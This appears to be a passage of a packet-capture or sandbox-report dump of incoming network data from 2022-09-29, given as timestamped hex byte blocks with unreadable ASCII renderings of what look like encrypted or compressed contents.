                                                                                                                                                2022-09-29 12:51:28 UTC6147INData Raw: 70 18 fc 34 eb ac 24 41 6a 96 15 a4 1e 3f fb a3 e5 77 c9 65 18 b6 08 ad 6b a6 96 fc d3 20 02 fc 5f d7 cf 99 f9 90 ca c6 5c 01 93 c9 48 e6 8c 07 e4 d0 49 e2 79 51 0d 16 d7 42 41 e5 13 99 8f f9 b2 b2 a0 40 ea f5 15 f8 c4 ca 22 03 3a a2 7a a0 aa 26 30 55 cc 7d 65 6e 3e cd 99 83 fa 90 6f 36 8e ba f2 de f1 ca 00 f1 66 7e 2b 44 37 f6 48 e5 87 4a bc 08 a0 c2 18 40 af 35 3f 02 fd eb fe 87 c3 bf 6c 54 0a af 0e 1e d3 2c 53 03 58 19 90 b6 bb f4 d9 57 ba 52 6d 65 e6 90 5a 2b 0e 1d 9e 4d 21 d1 8d 91 5d 91 43 5f e1 2a 1f 9c 37 96 e5 6a 45 ed 74 5b 78 b3 eb 43 2d b9 39 24 f8 82 5f af 4c c2 67 f3 c8 a0 6d c2 07 da 95 75 b9 46 d5 47 f3 08 e7 49 d5 89 81 67 af 20 a1 d3 89 6a 19 15 50 d1 ac 67 b2 c9 b6 8e dc 11 53 74 6a fd 5c e2 ae a4 46 a8 9b 7e 61 b5 24 ae 63 ec ba 69 05
                                                                                                                                                Data Ascii: p4$Aj?wek _\HIyQBA@":z&0U}en>o6f~+D7HJ@5?lT,SXWRmeZ+M!]C_*7jEt[xC-9$_LgmuFGIg jPgStj\F~a$ci
                                                                                                                                                2022-09-29 12:51:28 UTC6163INData Raw: 1f 27 c0 a9 80 88 b2 67 ae 2d 82 49 e0 2a ce 44 04 92 3c fd a2 80 ca d2 1a 93 96 29 3f d5 fc 46 ea 41 e4 bb 5c 71 a1 7a 79 78 e2 92 e4 7f 0a e5 94 a9 ef 0e 19 81 ab 01 16 cc fa 91 a6 19 e7 ff a0 2b cb 48 4b 90 ff 44 46 30 58 8f 0e e8 64 07 d0 b9 52 37 82 44 d6 c9 9d e3 ac 23 e1 44 85 28 03 0d df 13 30 0f ae 5c a7 21 be 40 da 91 01 85 ff b8 39 93 3a fe 3c 77 3b 1a 14 b8 7c ac 20 f7 9f e7 80 71 14 56 ce 1a 40 92 b4 a3 26 df 21 ec 87 83 1c 90 9a 3c 51 00 88 c0 c3 1f 7e 21 a5 69 db 07 21 ad f0 00 64 a5 88 8a 17 d7 f4 22 9c 7d 6d 32 b9 c0 d1 61 2b 60 7c bd 7e 1a cc 63 dd 6c 94 a6 be 45 97 b8 2d 97 83 a4 99 b5 00 27 9e 4a e2 ec 2c e6 8e a8 4a a6 cb 93 5e fb 69 05 ad c7 9b 11 1e 6b f4 08 5b 70 d0 4b 91 17 b1 36 96 6b c6 0f d1 46 94 67 76 a6 a3 f5 5b c4 be 2e 7b
                                                                                                                                                Data Ascii: 'g-I*D<)?FA\qzyx+HKDF0XdR7D#D(0\!@9:<w;| qV@&!<Q~!i!d"}m2a+`|~clE-'J,J^ik[pK6kFgv[.{
                                                                                                                                                2022-09-29 12:51:28 UTC6179INData Raw: dd 2e 55 64 21 8f 52 45 ab 78 c4 c7 4c f0 bd d7 84 53 99 0e 60 c0 7e ee 7d 7e cd 2d 9f 58 aa 6f f8 88 20 f1 42 d7 4a 4b 78 2d 65 ab da 7e d7 a1 5d d8 6d ba 9c 60 b0 23 b7 59 1d d4 c4 f2 9d af cf cc d9 d9 ea 96 26 97 96 90 76 c7 ce 1e f8 53 ea ce 2e bc f6 8e 8d 37 c2 36 fe 67 3f 0b 3d 7b 50 1c 93 d4 98 ec da 60 2e 53 20 bd c6 7d 3b 32 bd 14 6a 97 25 28 c6 73 c4 09 e4 df 10 a7 c5 1c 6a d3 2f 7e 79 41 91 bd a8 e5 cd 88 a8 52 f6 04 95 97 de 6d 88 22 3e 71 01 a0 f9 17 e1 d0 78 f8 f0 36 eb 2b d0 6d cc bf dc 95 30 3b ca 14 67 3e 4f 97 1c 02 80 09 5f 18 0a b3 cb 63 c6 8f e9 18 fb 32 eb 08 20 d6 89 e9 45 0b fa 56 c2 58 ae 70 18 62 ce 1f b0 2d e8 bd 53 cf ef 27 51 13 79 03 db 5c 3f 1c 6d 7f 71 54 3d 60 40 0e a7 bc b1 d9 2b e5 2e 09 d4 51 99 84 36 5e 71 ac e9 7b 39
                                                                                                                                                Data Ascii: .Ud!RExLS`~}~-Xo BJKx-e~]m`#Y&vS.76g?={P`.S };2j%(sj/~yARm">qx6+m0;g>O_c2 EVXpb-S'Qy\?mqT=`@+.Q6^q{9
                                                                                                                                                2022-09-29 12:51:28 UTC6195INData Raw: da 19 5a 12 22 98 04 c7 d5 31 84 fd 12 42 e9 2b 0f 89 f9 db 66 33 2e d9 6c 6d d8 5d 71 69 e6 70 9b 29 f4 da db 96 d9 52 0d 5b 36 5b d4 a3 7b b0 7b ee 03 5e 4a cf 15 90 fe f7 cb da 12 bc 4a c0 ab d9 49 33 dd 67 67 55 c4 25 ce 49 20 67 7b 57 81 f5 d0 9e 77 7f bd 99 cb a5 74 38 b3 62 07 2a e3 1f 02 a4 62 77 38 48 0f 05 95 5d 90 bd 27 1a a1 43 5b 78 45 ea a5 40 fa d2 b9 25 f7 8f 2b e5 33 9d 41 6b d7 3c a4 28 ae 7d e3 0c ee 9b 66 b2 e0 b1 71 3e 52 ef 7c 6e 62 fc 86 bd ee a9 53 af 0f 89 87 80 a7 8f aa 15 6b 4f c4 f7 8f 3b eb 18 0e ce 60 e2 56 a4 24 f3 31 f5 24 39 2b 3e de 1f 67 fe 46 11 c0 cd 14 a3 fc c7 f4 eb 28 ab 9a 6c 08 3f be 88 35 3a a6 74 ce ba 91 fc db 6f b1 b5 67 9f bf 38 da 1b 47 d5 cf 50 54 9b 8c 46 24 b9 7e fc 22 54 42 46 18 4c 61 2b ac 52 df 5a d5
                                                                                                                                                Data Ascii: Z"1B+f3.lm]qip)R[6[{{^JJI3ggU%I g{Wwt8b*bw8H]'C[xE@%+3Ak<(}fq>R|nbSkO;`V$1$9+>gF(l?5:tog8GPTF$~"TBFLa+RZ
                                                                                                                                                2022-09-29 12:51:28 UTC6211INData Raw: 8f 78 a4 d7 db db 79 93 3e 23 19 28 34 ed 55 b4 8c f0 45 9e d1 b0 86 73 86 78 61 0d a1 42 6b 65 05 8a 9f 7e a6 c8 70 9a 17 57 a5 18 02 b7 5a 20 3f f8 5f c6 46 e1 00 b8 52 73 76 81 67 ab b6 a9 34 6c ce e1 f7 1e 52 f8 11 aa 6e e7 56 5e 60 cd be 3a 26 ae c9 c0 51 b0 16 27 5b 72 a1 ab 3e 93 e3 0f 0f f2 41 ef af ee 93 4d 71 42 7b 19 b6 6c 18 1c d9 50 1e 0b 82 a3 a5 cc 95 c8 50 38 2c 65 93 6f 16 1d af fd 89 e9 d5 32 67 91 68 04 d9 ad 9e 36 b1 57 f7 44 4e 26 f3 f7 38 a6 72 97 98 b3 44 53 af 5e 03 c6 06 ae fe af 07 42 3d b8 e2 78 a2 d0 c3 ff b4 c8 95 8e 43 82 b3 d3 ab 2b 92 f1 50 af d7 38 21 11 19 f4 7e 50 ee 57 c0 d9 6a 65 9a cd 22 fc 3d 27 9c 60 cf 9f c4 06 c5 6a 87 fb 29 1f 71 b5 a4 4b 7c da 1b f1 c6 36 8b 23 6d c9 8a 7c ec 53 f1 2a c8 30 7f 83 f5 87 9d a0 da
                                                                                                                                                Data Ascii: xy>#(4UEsxaBke~pWZ ?_FRsvg4lRnV^`:&Q'[r>AMqB{lPP8,eo2gh6WDN&8rDS^B=xC+P8!~PWje"='`j)qK|6#m|S*0
                                                                                                                                                2022-09-29 12:51:28 UTC6227INData Raw: 89 a5 03 37 da c1 fa b1 cd d3 1f bf 40 6e d3 b0 ae 5a a0 d6 a4 5f 8d 72 6a d0 ee fd 6e 58 24 4a d3 2e bc 5c 92 79 ee 75 97 ab 7f c1 2d 4e 4a a4 9b 62 a3 47 a7 08 dd 41 91 30 79 d0 4c 81 53 39 f1 c9 be 36 c2 80 51 b1 2d 32 89 fa 35 3a a4 f6 99 a9 e9 bf 6a 0b b0 ef ac 64 e5 ae 65 4f 7e 7b 42 51 10 65 76 9a 69 39 c4 0a 7c 2f 24 d1 3e 65 13 67 09 1e 50 2c 1c 31 b2 ea 25 9d 42 3c 25 87 72 44 ac 62 83 ac 9a e8 ce 8a 66 50 bb ad b7 48 7f 1d 15 f0 7c da cd 70 7f 08 2d 68 94 a8 40 9a 5d 8e c1 d6 a5 e7 26 f8 93 f6 97 3f 2f 6d 51 7e aa c2 b0 c9 83 bf e6 a7 a8 ab 0a 32 6b 77 28 77 2a 05 0e 8f 31 a2 92 92 07 d1 2a 35 df 71 7f 52 b5 dd 2c df 09 33 58 bd a7 45 16 1f c9 09 4f 36 83 99 99 8a a7 db cb 8c d6 0e a8 8c 2b 6c 97 51 67 ac 94 85 db 14 72 6c 91 f5 e3 13 82 40 d7
                                                                                                                                                Data Ascii: 7@nZ_rjnX$J.\yu-NJbGA0yLS96Q-25:jdeO~{BQevi9|/$>egP,1%B<%rDbfPH|p-h@]&?/mQ~2kw(w*1*5qR,3XEO6+lQgrl@
                                                                                                                                                2022-09-29 12:51:28 UTC6243INData Raw: 94 89 bb cb dc d1 65 8f 05 cf 17 57 8a 4b 75 43 32 76 35 fc 62 4c 57 d8 b1 ac 82 34 0e f5 9a 79 d0 56 7e dd ba 54 47 df 8e ca 55 fe be 00 86 95 94 7d 01 69 9f 0b 7a 86 6f ea 45 5b db 12 b6 bc ed 58 4e 5c f5 85 ac 8d b0 00 8e 86 38 78 ee 58 0d 24 08 2d 9d 88 a4 54 96 bf 4d 13 23 cc 9f ec f2 f5 cb ff 3d 02 84 5c 01 f7 f5 23 08 fc f3 27 3a 70 aa 25 a2 e9 9f 13 6e 04 b9 41 28 21 40 5e f9 48 7c 83 e9 1e 33 94 9d 2a 8b 76 c1 c0 99 e7 6b 6a df e3 c1 8b 2c 4d fa 95 e9 a9 a6 5c 1c a2 b2 02 89 fa 9d 0f e2 88 4b 5a 1c 46 ec b0 f3 39 b5 12 46 3a c1 a6 b6 78 f0 2d 67 4a fe d5 f8 6a 28 a7 2a 2e e7 a4 a0 50 dc 91 71 39 4a 46 4a 68 b8 d5 aa 81 62 59 a3 0d 67 df eb 43 46 6d 40 68 ec 4e 7e 14 1a 8b 70 b9 5c 75 c6 43 82 94 22 00 8c 0b f4 11 ce e8 70 df 8b 95 e8 81 54 85 cd
                                                                                                                                                Data Ascii: eWKuC2v5bLW4yV~TGU}izoE[XN\8xX$-TM#=\#':p%nA(!@^H|3*vkj,M\KZF9F:x-gJj(*.Pq9JFJhbYgCFm@hN~p\uC"pT
                                                                                                                                                2022-09-29 12:51:28 UTC6259INData Raw: 91 47 99 62 15 4a ff 58 57 93 7f 44 8c aa 2b 0e c2 86 b1 24 d2 c1 f5 87 47 14 7e 02 55 15 61 7d a3 b9 b8 3b f0 53 0b 53 3e 1a d9 7b eb 42 1a c8 7a d4 e5 98 a3 f0 51 fb 2b e9 2b 69 3c 6d 94 b1 4f 95 c5 e8 71 81 60 78 aa fe 45 23 ef 0b f3 b5 48 c4 0a a7 ed 32 39 75 9e 90 fb 44 f3 13 6c 6b a7 81 9f f9 2c 83 21 d5 dd b0 3d 25 64 a3 c8 12 57 8e 46 54 9b 80 09 a7 52 52 77 d5 d0 9d 7b 50 4d 54 6a 4c a2 7c e7 85 53 1d 24 3e 87 bc 46 5d 64 7b fe 2e 54 82 13 31 a4 20 6d 4e 6d f5 47 a2 fc 77 39 6d f0 ad 99 66 5e 80 36 3d c6 6d 87 53 1d 5f 84 c6 00 35 0e 10 2e 7d c2 b2 33 4a 36 0e 9a 42 44 e4 43 23 f3 14 8e 6a 3d 1d 3e 9f 8f e4 aa 7d 18 b7 01 db 16 fe c2 d5 d7 9b 0f e2 49 71 82 87 4c 8d 84 40 a8 88 dd ca 7a 24 00 97 fe 7b fb 51 b8 53 29 a8 39 6e f3 72 5f 7c 50 68 53
                                                                                                                                                Data Ascii: GbJXWD+$G~Ua};SS>{BzQ++i<mOq`xE#H29uDlk,!=%dWFTRRw{PMTjL|S$>F]d{.T1 mNmGw9mf^6=mS_5.}3J6BDC#j=>}IqL@z${QS)9nr_|PhS
                                                                                                                                                2022-09-29 12:51:28 UTC6275INData Raw: 87 e9 1b c8 89 4b 45 36 a4 36 e3 a4 e6 6b ed 3c 61 44 e7 af f3 8f 6e d2 bb b0 1c 0c 22 a4 9e 77 0e b2 89 e5 7b da c4 50 50 a1 c3 50 75 f1 c8 d0 55 7c f8 ab bf 7b 68 42 b0 e2 8c 85 56 51 d9 fc 02 79 5c c7 7c 30 f4 bb ce 78 81 3d c8 be 6b 24 21 d8 e6 78 ad 57 f0 6d 52 10 75 dc 38 4d 2a 7a c7 28 17 23 4f 1f c6 3a c4 11 88 4d 53 93 80 8c 72 f0 38 8b 66 61 69 43 06 b4 ab d4 48 52 db 54 0f fe f1 11 f4 c4 25 0e 58 7d e9 65 82 ab 8b b3 cb 2f e1 d4 7b cf 2c 98 e2 23 87 ad 72 11 42 f4 f6 36 d4 60 d4 7f a5 c3 f4 75 6e 6f f5 00 2f c3 76 c4 ef 8a c7 1d 2a bd 79 e8 80 76 bc a7 05 00 81 22 b7 dd 26 d1 8e 98 04 4f ae c0 65 2e 72 72 b3 41 7e ab bc 38 8b e2 41 c2 bd a8 cd cc 24 f1 74 00 4d fb 09 47 63 de 71 95 3d fe e2 75 27 c3 a8 58 47 31 71 c4 48 26 57 12 56 aa de 36 5f
                                                                                                                                                Data Ascii: KE66k<aDn"w{PPPuU|{hBVQy\|0x=k$!xWmRu8M*z(#O:MSr8faiCHRT%X}e/{,#rB6`uno/v*yv"&Oe.rrA~8A$tMGcq=u'XG1qH&WV6_
                                                                                                                                                2022-09-29 12:51:28 UTC6291INData Raw: e2 90 8e 3a 9e 24 cb 2a 50 b9 69 4f 91 97 b5 a9 70 23 c1 82 03 8e cb f2 b7 f3 4a ed 07 96 bd ec f2 53 93 79 a6 3f 68 2b 17 39 df ca 5b c3 b1 f4 66 1f d0 28 bd 3f 66 0b 15 c1 a1 8b 64 56 1d b9 7f 87 89 c4 d7 ce 85 57 08 50 bf 69 50 4f 78 ca 6d 78 6c b0 0f 6d 72 a3 d5 b2 79 22 26 f1 50 99 5d 72 ce 43 1e cb 28 ac 7d a7 28 ed 9d 4c f9 a4 ba ab f3 e9 21 dc b4 90 85 a9 2f 3c 85 d7 5a 51 90 63 0f d6 8c 42 18 b0 6c 4f 0b 99 a8 45 69 74 f3 a7 26 0b 23 b2 75 ad 5d be 4d 57 97 7c 0a 15 35 14 d7 40 60 af de ba 52 51 c4 cf 9d eb 8f 19 17 11 c6 c5 3e 0d 97 e5 00 d6 ab da f1 58 49 72 f0 1c f1 c9 8f be 95 68 a7 bf 3a f4 e7 5c 9d 47 77 e8 21 30 9f 87 d1 f5 72 74 d1 04 e3 30 3f aa 8d 1d 00 03 3b 47 24 87 30 12 76 01 fd c3 c0 5c d8 60 83 01 b3 65 6a 28 cf 25 5a 31 33 0d 23
                                                                                                                                                Data Ascii: :$*PiOp#JSy?h+9[f(?fdVWPiPOxmxlmry"&P]rC(}(L!/<ZQcBlOEit&#u]MW|5@`RQ>XIrh:\Gw!0rt0?;G$0v\`ej(%Z13#
                                                                                                                                                2022-09-29 12:51:28 UTC6307INData Raw: 34 3f 6c 10 25 34 45 0b 3b e7 dd aa ae 85 ad b2 0c cd ff 4a de 27 e3 72 7d 2e c5 16 be f5 25 05 69 ec e8 4c 5a 8c bb d3 54 1e 8b e6 a5 66 1c dc 08 34 5a 45 e3 5c 1c 0d 62 cd a4 12 8e 80 8f 35 03 0a a6 88 18 0d 66 09 82 f2 c8 c2 8c f2 6a c3 52 c5 bd 0f bf f8 c6 6a 02 c8 03 d5 d8 d3 ad ba 9b 39 a1 f9 17 42 e8 e6 bb 14 7a 8c a3 5d fe 79 66 1c a7 26 2d f5 81 6e 60 ef cb a2 e6 87 ff d9 b6 f4 7c 6d f1 92 12 35 58 1d 42 9e f9 fc f6 e9 e7 06 43 01 7d c2 26 f4 3e e3 34 22 e7 11 8f 0e b2 dd ed d9 bf 86 24 e1 27 3c 00 47 e2 8f de 4b 1b 2e a6 54 3f f1 47 28 46 53 53 5b 86 ec e9 3b c9 dd bb 42 77 a9 ca 9a 32 1c 6f 93 ad 75 f0 79 b8 64 8d 05 62 15 5e 6c f1 cc 41 08 68 5e d1 94 0f 0d 4b 49 82 14 57 86 32 c0 3b cf d1 d8 54 b7 0e 6e ee 1a a1 58 a4 af c8 65 82 86 ad 08 72
                                                                                                                                                Data Ascii: 4?l%4E;J'r}.%iLZTf4ZE\b5fjRj9Bz]yf&-n`|m5XBC}&>4"$'<GK.T?G(FSS[;Bw2ouydb^lAh^KIW2;TnXer
                                                                                                                                                2022-09-29 12:51:28 UTC6323INData Raw: c7 be be fc 95 f4 26 7a 1f eb f7 4c cf 9f 27 79 32 94 10 86 db 24 91 d0 5b 98 a5 84 e9 12 92 54 86 56 9b aa b9 51 48 e7 38 51 29 fe 11 ce 44 0d 5c 3f b9 c3 c8 01 8e 85 77 56 ce c8 51 4f 6a f0 a9 80 00 bb 9b 28 ea 0f e4 ec fd 58 94 b8 a2 c5 ba 58 08 dd a8 2d fe a4 0a 95 94 04 b0 7e 33 10 0c 40 fd d4 bb ce 03 29 99 e2 a2 aa 1b 54 07 b7 3a d3 36 6f 91 91 60 aa 0b 2e ab 08 ef 86 df f8 d5 0b b3 4d 29 61 2a d7 8f 30 ac a3 a4 85 a4 81 34 f5 ea 93 4b cc df 79 24 78 13 2d 0e 87 65 90 8e ff c8 cb 99 91 23 b6 53 a5 1e c9 e9 44 7b 4e 5b 5f f2 17 be e6 e2 a7 1b 22 d5 19 79 ff 8b 5b b2 9c 19 41 6b 0d 71 9d ec 70 2e f6 92 23 a4 8f 96 8b 1a 4a 4c 7a 99 05 d6 4d 1f 46 82 92 4d bc ce 72 2b 49 8c d6 47 e8 30 2a 96 82 a1 2e f9 8a d1 92 65 62 fa 3f 6b 19 c1 63 f6 6d 0a 04 f9
                                                                                                                                                Data Ascii: &zL'y2$[TVQH8Q)D\?wVQOj(XX-~3@)T:6o`.M)a*04Ky$x-e#SD{N[_"y[Akqp.#JLzMFMr+IG0*.eb?kcm
                                                                                                                                                2022-09-29 12:51:28 UTC6339INData Raw: ed 94 fb cf 3c ad ab 3e e8 54 69 7f cc 30 c0 c9 ed 0b 4d 47 2e 30 b6 96 d6 ed 31 16 5c 7d 12 14 d0 b7 b2 53 a7 f8 f8 56 5f 16 b9 0a b9 9d 0b 47 ec 1a ca d0 f6 14 77 97 53 7b 16 0f aa ca 50 ae 31 48 51 5d b5 2d 7c 72 3d 37 7d 84 c2 25 19 a2 21 dd 51 03 cd af 17 e5 0e a2 dc ff 28 75 d3 30 2d 77 f0 55 53 a0 fa 4d a2 43 66 b0 b8 21 5b bc 32 04 01 bf 11 2c d9 79 87 ec b7 83 44 3a ed cb 34 32 73 92 c7 3b 1d 56 e1 0d 81 49 5d f9 66 be 07 d6 7f c6 a8 6b 4f 5a 94 0e 16 fb 07 3c d7 df 9d 40 2a b8 77 55 44 00 e9 85 ed 69 03 e3 38 58 1b a8 e3 81 20 bb dc 2c fb b2 2f e5 ec 11 5d ed 42 d2 41 f3 4c b1 c8 ab e6 e7 f3 62 bf 87 d5 ec c2 f7 c3 92 90 3a ad 77 f5 e6 ca f4 b9 f2 08 18 36 f1 09 7a c0 4f 56 76 65 b7 1b 6e 4b a6 fe 54 7b be 47 d0 52 f4 b2 13 4d 0f c3 b4 5a 5d 4d
                                                                                                                                                Data Ascii: <>Ti0MG.01\}SV_GwS{P1HQ]-|r=7}%!Q(u0-wUSMCf![2,yD:42s;VI]fkOZ<@*wUDi8X ,/]BALb:w6zOVvenKT{GRMZ]M
                                                                                                                                                2022-09-29 12:51:28 UTC6355INData Raw: 2f 8c 67 49 4b e5 1f 84 6a 4c d6 de e3 f2 0a 15 a6 19 6d 1a 69 37 74 cc 47 9e 3e 3b c1 90 94 e4 56 15 d7 8f 13 1a 5c 21 0a f4 ab f1 dd ce 65 3c 32 9d b6 24 46 c4 d9 bc 10 26 ac ed 83 c2 19 bd 60 08 3e bf 2f 67 c8 50 38 35 23 47 da cd ef 7a 0e 4c 92 d3 d1 14 38 63 b3 88 71 f6 9e 8f e2 ed a4 83 9d c9 c8 45 19 16 6a 59 ce 02 b2 61 ab fc 12 06 45 fe 88 e1 5b f7 a3 e8 98 03 cd aa 7c ea 76 38 45 2e 50 50 3c af ce 0e f6 b5 6c 33 e7 42 fa ef c7 b7 93 d6 b3 2a 7c 77 13 08 8a 99 f5 b4 c2 bf 47 b7 9c d6 11 4e 1a 27 54 bf 47 d4 2a 9a 6f e1 1c c6 8e 8c cd fa d8 06 38 83 fc cd c5 9e 3d 6f 44 56 67 49 df 03 03 69 74 95 ac f4 80 1a 9e 03 d6 e5 ae 2b 78 80 a8 ff db 8a 23 04 ad 61 56 66 bd bf 75 b3 ea 20 22 a5 4d d8 44 b2 82 63 3d 59 88 6f 47 f0 d2 66 c9 94 f0 68 da 00 84
                                                                                                                                                Data Ascii: /gIKjLmi7tG>;V\!e<2$F&`>/gP85#GzL8cqEjYaE[|v8E.PP<l3B*|wGN'TG*o8=oDVgIit+x#aVfu "MDc=YoGfh
                                                                                                                                                2022-09-29 12:51:28 UTC6371INData Raw: ce d8 48 6d 61 fb 0f db dd fd e7 54 6c f7 38 d4 e6 2e a2 99 61 e9 5a 72 8a 6b be cd 4d 84 44 c6 22 7d a6 a6 4b de 48 79 8c 9b 03 69 9e 96 95 be b1 24 de 6b 29 dc 58 c7 b7 84 6b bd a2 56 1f 4d 24 ff d5 e2 cc cd 8b d0 3e 36 98 8d 0b 74 6b b7 8f 6d e2 7d 21 1a c2 22 a8 2d d5 31 d3 fe 1a f9 df cc f4 83 f7 15 fe ae 6c 3b b3 68 2b 8d 1c 30 fe b7 8e c6 be cb e2 7b 40 f8 7a bd be cd 4c 30 de 97 fe 1f 27 9a cf 4e 4a 45 4a d9 1e c7 79 56 3f 5e e9 f4 77 44 4c 99 7f 47 60 aa 85 be ea f5 46 62 c7 6b 6e df 9d 32 02 e1 30 0d 63 ac d1 c7 bd b2 02 ea 77 29 38 31 0a 3a 62 bb f5 56 74 3a 7a b2 c6 00 00 98 d0 ca 1b c0 ac ee 89 7f 08 d1 04 d9 af 01 cb b4 45 4c 82 b1 4d cc 78 66 6a 99 f7 05 48 c7 63 fb 9d 07 e7 5e 35 78 45 54 39 0a 93 49 89 d4 85 0b ce fd 6d a4 37 f0 21 f2 ab
                                                                                                                                                Data Ascii: HmaTl8.aZrkMD"}KHyi$k)XkVM$>6tkm}!"-1l;h+0{@zL0'NJEJyV?^wDLG`Fbkn20cw)81:bVt:zELMxfjHc^5xET9Im7!
                                                                                                                                                2022-09-29 12:51:28 UTC6387INData Raw: 1c 2c 2e 15 9c 11 f4 97 6b 44 12 50 b6 a4 ea 08 df a8 02 d7 25 5a 53 f4 09 db 13 99 84 ab 01 26 98 74 ec 77 17 b8 74 25 40 26 aa 5b 0b ec 6a 70 e2 87 80 53 3f 90 ee 93 6c 73 62 2b 0d aa 3d e8 4a 47 8b 95 11 fe 21 3b 69 66 92 2a 66 b6 b0 87 95 17 e5 d4 47 41 df 60 b4 f2 40 d4 11 30 23 ed 51 1b 4c f4 42 30 7d 8d bd 9e 6a 9e 07 6f 2b bc c4 d4 54 c1 55 97 6b 25 51 ed 00 73 78 81 7f 41 09 0c 34 d1 2c a9 a2 c7 ab 83 44 e5 5d 85 76 54 08 fe 48 69 ca 84 c9 a7 e6 69 eb 53 58 7b c6 10 6f 82 90 0f 6e e6 2a 40 4d c0 b6 ce ea 3b e2 fb c5 84 25 78 d4 72 d8 5a a5 1d ba b7 dc 42 ef 24 c7 34 42 b2 dc ce e0 9a b9 0c 07 62 97 ac 64 58 90 c1 8e fb 46 4d 28 e5 51 46 3c 9d 23 c1 1b ff e0 ce 6d c3 92 6a a7 5f 03 e2 50 b1 eb 5d 41 17 ed f0 07 dd 12 de 59 6c 0c 1c e9 a8 10 5a ae
                                                                                                                                                Data Ascii: ,.kDP%ZS&twt%@&[jpS?lsb+=JG!;if*fGA`@0#QLB0}jo+TUk%QsxA4,D]vTHiiSX{on*@M;%xrZB$4BbdXFM(QF<#mj_P]AYlZ
                                                                                                                                                2022-09-29 12:51:28 UTC6403INData Raw: 79 58 c4 cc af d8 99 96 e1 0f 9f 88 6d ff f6 96 ae 5d c4 14 73 59 a9 83 72 a8 9e e7 69 30 48 4e df db 16 bc 6e 1d f4 92 6c d1 7b a8 10 ae ba 7d f7 60 77 73 9a 49 7b aa ad 22 a9 1d b8 dc 91 a3 b8 21 70 8a 88 ef 6b 7c fb f7 73 76 31 04 b1 ac a1 fa 2d ec d2 4c 85 61 30 ff 31 c3 b3 e6 be 88 e4 35 05 a4 20 1e 7f 29 98 70 22 cc 5a 1b 52 43 a1 ea 1c 6f 1b a8 16 87 4d 80 32 6d cd 43 5a ea c9 e7 7c 7f 84 48 17 88 db 1c cf 2d 94 7e c7 08 31 81 6a f1 78 ca 34 90 de 3b 9d ae 9f 9d da fe b7 b1 1f 39 8f f3 c3 3e 45 cd e6 15 e6 11 77 d5 7a 2d a3 2d 63 08 da bf 8c d2 27 04 3d d0 85 af fe 94 3a 46 37 6b a9 8f 99 cb c1 2e 1c 57 77 1a dc d3 e6 60 5a f5 fa f6 ec 38 5d 4b f7 9a 3f 24 57 57 a7 bd 0a 32 59 bb d6 28 c3 b6 29 f9 ed b6 d2 07 f6 6e a6 bf b5 38 26 76 f4 dc b3 ce 86
                                                                                                                                                Data Ascii: yXm]sYri0HNnl{}`wsI{"!pk|sv1-La015 )p"ZRCoM2mCZ|H-~1jx4;9>Ewz--c'=:F7k.Ww`Z8]K?$WW2Y()n8&v
                                                                                                                                                2022-09-29 12:51:28 UTC6419INData Raw: 21 bd 77 86 73 eb 7b de 01 ac 85 98 9f c6 fa 53 d7 6c 3a 8e dc cf c3 80 8e 3a 96 7e f8 bd a6 39 0b f5 fb ed f3 d2 06 3c d4 8d ab f8 a8 ea 72 bd 22 4b 03 72 27 98 d7 06 08 c0 b9 b6 ee 2c 61 6c 1c 70 ef 4d 35 bd 64 ae 8b bc ba f3 b0 b5 74 4b 97 72 44 1c 7d 5d 54 16 b1 53 9f e7 99 9b ef 90 bf 35 55 35 48 40 fa 83 ac fa 6c b0 79 f9 26 e7 ed e7 0a 5e 69 80 0e c2 a6 15 ca 57 18 3e 66 da f0 8c bd 3b 9f bd 1c d6 12 f7 f0 30 0e 68 5f 0b 84 53 ec 44 5d 03 c7 28 a8 64 59 63 7d d5 54 2a 86 b8 37 a5 b6 4c 5d 8e 25 67 72 95 6b 67 da 08 ef d9 41 07 47 ea 15 70 3f a9 4a 78 07 e4 ba 2b 85 64 b5 98 ee b7 85 0a bf cd 72 df 81 4a c3 ba c5 74 45 50 dc ca da 94 26 6e b6 d4 93 f0 80 71 18 e2 23 59 06 fe e0 26 aa 89 01 29 b1 64 83 ec fd 68 43 3a 3c 1c a1 41 4d ec 1d b6 e3 e0 77
                                                                                                                                                Data Ascii: !ws{Sl::~9<r"Kr',alpM5dtKrD}]TS5U5H@ly&^iW>f;0h_SD](dYc}T*7L]%grkgAGp?Jx+drJtEP&nq#Y&)dhC:<AMw
                                                                                                                                                2022-09-29 12:51:28 UTC6435INData Raw: 92 1d 02 ac 0f 2e 5d ba de 16 4c a6 66 be 46 e8 b8 15 02 63 f3 9a 90 14 16 6f d0 43 97 97 30 a3 4c 30 f7 fb c0 d7 c2 c2 b0 1b 44 08 78 4e a7 b5 76 6c 40 69 1b b2 97 7c 7b 6f 0e aa 76 ed 5c 0d 88 1c 9c ca 2f 88 2e a2 1a f9 71 6f d6 89 53 00 c7 da 61 c5 d7 70 48 0c 19 3e 0c 04 a0 71 a2 33 16 73 bc 63 7a 8c 41 67 df 4e 18 c2 74 92 12 88 83 53 97 55 4c 5e b0 3f ff 70 f1 f8 55 12 e7 fe d8 58 f1 48 58 11 f1 a3 83 d2 30 cb 8c 21 4d 30 ef f3 04 15 a1 41 f9 ce 26 e5 1b 07 f8 ee ce d1 47 a8 c2 6b ba ee 82 08 cb 2f b8 c6 cd c7 3c 03 52 03 4a 21 48 f8 44 4e f7 12 95 f1 9a 52 82 b5 7e a6 dd 3c 68 6a 55 69 d2 f0 62 cd 76 42 4d 7f b0 82 64 5b 8f 7e 27 3d 7c dc f9 f9 a7 cd 5e 1f 8d f4 9c ba 79 b2 d8 6f 6e 87 86 6b 0e 1f 98 ec 5a 8b 37 13 60 65 97 b1 93 0b b3 47 11 24 dd
                                                                                                                                                Data Ascii: .]LfFcoC0L0DxNvl@i|{ov\/.qoSapH>q3sczAgNtSUL^?pUXHX0!M0A&Gk/<RJ!HDNR~<hjUibvBMd[~'=|^yonkZ7`eG$
